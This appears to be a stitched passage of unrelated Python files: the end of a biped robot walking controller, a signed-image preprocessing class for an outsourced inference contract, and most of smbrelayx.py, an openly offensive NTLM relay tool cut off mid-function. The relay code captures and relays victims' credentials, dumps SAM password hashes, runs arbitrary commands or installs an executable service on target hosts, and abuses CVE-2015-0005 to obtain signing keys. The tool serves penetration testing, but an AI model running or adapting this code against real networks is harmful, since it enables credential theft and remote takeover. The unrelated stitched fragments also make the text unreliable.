info = json.loads(out)
except:
pass
print(info)
print(str(temp)+'°C\t'+str(state))
print(lapin.l_ankle_y.present_position)
if info["RF"]["F"]+info["RB"]["F"]+info["LF"]["F"]+info["LB"]["F"]>80:
rbalance = (info["RF"]["F"]+info["RB"]["F"])/(info["RF"]["F"]+info["RB"]["F"]+info["LF"]["F"]+info["LB"]["F"])
onGround = True
else:
rbalance=0.5
onGround = False
roll = 0.0#info["GYR"]["X"]
print("rbalance: "+str(rbalance))
print("roll rate: "+str(roll))
ecart = 10
avan = 20
# state machine
if state == 0:
alpha = ecart
theta = avan
aLc = 0.9
aRc = 0.9
speed = 100
compliant = False
if rbalance>0.5:
state = 1
elif state == 1:
alpha = ecart
theta = -avan
aLc = 0.9
aRc = 0.9
speed = 100
compliant = False
if rbalance<0.5:
state = 0
elif state == -1:
alpha = 0
theta = 0
aLc = 0.5
aRc = 0.5
speed = 10
compliant = True
# actuators
(aFr,lFr) = MGD((90-lapin.r_knee_y.present_position)*math.pi/180.0)
(aFl,lFl) = MGD((90-lapin.l_knee_y.present_position)*math.pi/180.0)
lapin.r_hip_x.pid = (KP,KI,0)
lapin.r_hip_x.compliant = compliant
lapin.r_hip_x.goal_position = alpha/2
lapin.r_hip_x.moving_speed = speed
lapin.l_hip_x.pid = (KP,KI,0)
lapin.l_hip_x.compliant = compliant
lapin.l_hip_x.goal_position = alpha/2
lapin.l_hip_x.moving_speed = speed
lapin.r_hip_y.compliant = compliant
lapin.r_hip_y.goal_position = 0-theta/2
lapin.r_hip_y.moving_speed = 0
lapin.l_hip_y.compliant = compliant
lapin.l_hip_y.goal_position = 0+theta/2
lapin.l_hip_y.moving_speed = speed
lapin.r_knee_y.pid = (KP,KI,0)
lapin.r_knee_y.compliant = compliant
lapin.r_knee_y.goal_position = interp(aRc, -23, 90)
lapin.r_knee_y.moving_speed = speed
lapin.l_knee_y.pid = (KP,KI,0)
lapin.l_knee_y.compliant = compliant
lapin.l_knee_y.goal_position = interp(aLc, -23, 90)
lapin.l_knee_y.moving_speed = speed
lapin.r_ankle_y.compliant = True#compliant
lapin.r_ankle_y.goal_position = aFr-lFr+ankleOffset
lapin.r_ankle_y.moving_speed = speed
lapin.l_ankle_y.compliant = True#compliant
lapin.l_ankle_y.goal_position = aFl-lFl+ankleOffset
lapin.l_ankle_y.moving_speed = speed
time.sleep(0.005)
for mot in lapin.motors:
mot.compliant = True
time.sleep(0.04)
lapin.close()
|
Prepocesser.py
|
import sys
import socket
import traceback
import cv2
from imutils.video import VideoStream
import imagezmq
import threading
import numpy as np
#from time import sleep
import time
import videoStramSubscriber as vss
import parameters
from nacl.signing import VerifyKey
class Preprocesser:
def __init__(self, receiver, vk, merkle_tree_interval, minimum_receive_rate_from_contractor):
self.receiver = receiver
self._stop = False
self._data_ready2 = threading.Event()
self._thread2 = threading.Thread(target=self._run2, args=(vk, merkle_tree_interval, minimum_receive_rate_from_contractor))
self._thread2.daemon = True
self._thread2.start()
def receive(self, timeout=45.0):
#a = 0
#waited = False
#if not self._data_ready.is_set() :
#a = time.perf_counter()
#waited = True
flag = self._data_ready2.wait(timeout=timeout)
if not flag:
raise TimeoutError(
"Contract aborted: Outsourcer at tcp://{}:{}".format(self.hostname, self.port) + 'timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review')
#if waited :
#print('Waited', (time.perf_counter() - a)*1000)
self._data_ready2.clear()
return self._data
def _run2(self, vk, merkle_tree_interval, minimum_receive_rate_from_contractor):
#receiver = imagezmq.ImageHub("tcp://{}:{}".format(self.hostname, self.port), REQ_REP=False)
#countera = 0
#counterb = 0
while not self._stop:
#self._data = receiver.receive()
print('here')
name, compressed = self.receiver.receive()
print('here2')
if name == 'abort':
sys.exit('Contract aborted by outsourcer according to custom')
received_time = time.perf_counter()
# decompress image
decompressedImage = cv2.imdecode(
np.frombuffer(compressed, dtype='uint8'), -1)
# endregion
decompressed_time = time.perf_counter()
# verify image (verify if signature matches image, contract hash and image count, and number of outputs received)
if merkle_tree_interval == 0:
try:
vk.verify(bytes(compressed) + contractHash +
bytes(name[-2]) + bytes(name[-1]), bytes(name[:-2]))
except:
sys.exit(
'Contract aborted: Outsourcer signature does not match input. Possible consequences for Outsourcer: Blacklist, Bad Review')
# print(vrification_result)
if name[-1] < (image_count-2)*minimum_receive_rate_from_contractor:
sys.exit(
'Contract aborted: Outsourcer did not acknowledge enough outputs. Possible consequences for Outsourcer: Blacklist, Bad Review')
else:
# verify if signature matches image, contract hash, and image count, and number of intervals, and random number
try:
vk.verify(bytes(compressed) + contractHash +
bytes(name[-5]) + bytes(name[-4]) + bytes(name[-3]) + bytes(name[-2]) + bytes(name[-1]), bytes(name[:-5]))
except:
sys.exit(
'Contract aborted: Outsourcer signature does not match input. Possible consequences for Outsourcer: Blacklist, Bad Review')
if name[-4] < (image_count-2)*minimum_receive_rate_from_contractor:
sys.exit(
'Contract aborted: Outsourcer did not acknowledge enough outputs. Possible consequences for Outsourcer: Blacklist, Bad Review')
outsorucer_signature = name[:-5]
outsourcer_image_count = name[-5]
outsourcer_number_of_outputs_received = name[-4]
outsourcer_random_number = name[-3]
outsourcer_interval_count = name[-2]
outsourcer_time_to_challenge = bool(name[-1])
print('here2')
#print(name[-2], image_count, name[-3])
verify_time = time.perf_counter()
# image preprocessing
# region
original_image = cv2.cvtColor(decompressedImage, cv2.COLOR_BGR2RGB)
image_data = cv2.resize(
original_image, (input_size, input_size)) # 0.4ms
image_data = image_data / 255. # 2.53ms
images_data = []
for i in range(1):
images_data.append(image_data)
images_data = np.asarray(images_data).astype(np.float32) # 3.15ms
# endregion
image_preprocessing_time = time.perf_counter()
print('here3')
self._data = (images_data, name)
#countera += 1
#print(countera)
#f = time.perf_counter()
#time.sleep(0.05)
#counterb += 1
#print(counterb, time.perf_counter() - f)
self._data_ready2.set()
self.receiver.close()
def close(self):
self._stop = True
# Simulating heavy processing load
def limit_to_2_fps():
time.sleep(0.5)
|
smbrelayx.py
|
#!/usr/bin/env python
# Copyright (c) 2013-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Module
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc. It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first try to authenticate against the client connecting
# to us.
#
# It is implemented by invoking an SMB and an HTTP server, hooking into a few
# functions and then using the smbclient portion. It is supposed to work
# on any LM compatibility level. The only way to stop this attack
# is to enforce SPN checks and/or signing on the server.
#
# If the target system is enforcing signing and a machine account was provided,
# the module will try to gather the SMB session key through
# NETLOGON (CVE-2015-0005)
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set up against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
import ConfigParser
import SimpleHTTPServer
import SocketServer
import argparse
import base64
import logging
import os
import sys
from urlparse import urlparse
from binascii import unhexlify, hexlify
from struct import pack, unpack
from threading import Thread
from impacket import version
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient
from impacket.nt_errors import ERROR_MESSAGES
from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
STATUS_MORE_PROCESSING_REQUIRED
from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \
NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey
from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \
SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \
SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \
SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data
from impacket.smb3 import SMB3
from impacket.smbconnection import SMBConnection
from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
try:
from Crypto.Cipher import DES, AES, ARC4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need PyCrypto")
logging.critical("See http://www.pycrypto.org/")
# Global Variables
# This is the set of hosts that have been attacked already, in case -one-shot was chosen
ATTACKED_HOSTS = set()
CODEC = sys.getdefaultencoding()
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command):
Thread.__init__(self)
if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__answerTMP = ''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
global ATTACKED_HOSTS
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
# Something went wrong, most probably we don't have access as admin. Aborting
logging.error(str(e))
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
return
try:
if self.__command is not None:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
logging.debug('Raw answer %r' % self.__answerTMP)
try:
print self.__answerTMP.decode(CODEC)
except UnicodeDecodeError, e:
logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html\nand then execute wmiexec.py '
'again with -codec and the corresponding codec')
print self.__answerTMP
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
try:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
except Exception, e:
logging.error(str(e))
pass
class SMBClient(SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = str(user)
sessionSetup['Data']['PrimaryDomain'] = str(domain)
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
logging.error("Error login_standard")
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[
'user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
def sendAuth(self, serverChallenge, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = str(authenticateMessageBlob)
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
try:
errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)
except:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
raise
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = str(negotiateMessage)
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except Exception:
logging.error("SessionSetup Error!")
raise
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class HTTPRelayServer(Thread):
class HTTPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
one_shot, returnStatus=STATUS_SUCCESS, runSocks = False):
self.target = target
self.exeFile = exeFile
self.command = command
self.mode = mode
self.returnStatus = returnStatus
self.outputFile = outputFile
self.one_shot = one_shot
self.runSocks = runSocks
SocketServer.TCPServer.__init__(self,server_address, RequestHandlerClass)
class HTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
self.machineAccount = None
self.machineHashes = None
self.domainIp = None
global ATTACKED_HOSTS
if self.server.target in ATTACKED_HOSTS and self.server.one_shot:
logging.info(
"HTTPD: Received connection from %s, skipping %s, already attacked" % (
client_address[0], self.server.target))
return
if self.server.target is not None:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], self.server.target))
else:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], client_address[0]))
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
SimpleHTTPServer.SimpleHTTPRequestHandler.handle_one_request(self)
except:
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = ''):
self.send_response(401)
self.send_header('WWW-Authenticate', message)
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def send_error(self, code, message=None):
if message.find('RPC_OUT') >= 0 or message.find('RPC_IN') >= 0:
return self.do_GET()
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_error(self,code,message)
def do_GET(self):
messageType = 0
if self.headers.getheader('Authorization') is None:
self.do_AUTHHEAD(message = 'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
else:
self.target = self.server.target
try:
if self.client is not None:
logging.error('Still performing an attack against %s' % self.client.get_remote_host())
self.send_response(404)
self.end_headers()
return
self.client = SMBClient(self.target, extended_security = True)
self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
self.client.set_timeout(60)
except Exception, e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = 'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '' or self.target == '127.0.0.1':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = str(token)
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'],
respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials, except
# when coming from localhost
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
logging.error("Authenticating against %s as %s\%s FAILED" % (
self.target, authenticateMessage['domain_name'], authenticateMessage['user_name']))
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'], authenticateMessage['user_name']))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.outputFile)
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
global ATTACKED_HOSTS
if self.target not in ATTACKED_HOSTS:
ATTACKED_HOSTS.add(self.target)
if self.server.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None,urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=self.client)
activeConnections.put(
(self.target, 445, 'SMB', ('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient,
{'CHALLENGE_MESSAGE': self.challengeMessage}))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
else:
clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
self.client = None
clientThread.start()
else:
logging.error('%s is being attacked at the moment, skipping.. ' % self.target)
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
return
def __init__(self, outputFile=None):
Thread.__init__(self)
self.daemon = True
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.command = None
self.target = None
self.mode = None
self.outputFile = outputFile
self.one_shot = False
self.runSocks = False
def setTargets(self, target):
self.target = target
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Not implemented yet.
pass
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
def run(self):
logging.info("Setting up HTTP Server")
httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
self.outputFile, self.one_shot, runSocks = self.runSocks)
httpd.serve_forever()
class SMBRelayServer(Thread):
def __init__(self, outputFile = None):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.returnStatus = STATUS_SUCCESS
self.command = None
self.one_shot = False
self.runSocks = False
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if outputFile is not None:
smbConfig.set('global','jtr_dump_path',outputFile)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(SMB.SMB_COM_SESSION_SETUP_ANDX,
self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if smbData.has_key(self.target):
# Remove the previous connection and use the last one
smbClient = smbData[self.target]['SMBClient']
del smbClient
del smbData[self.target]
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
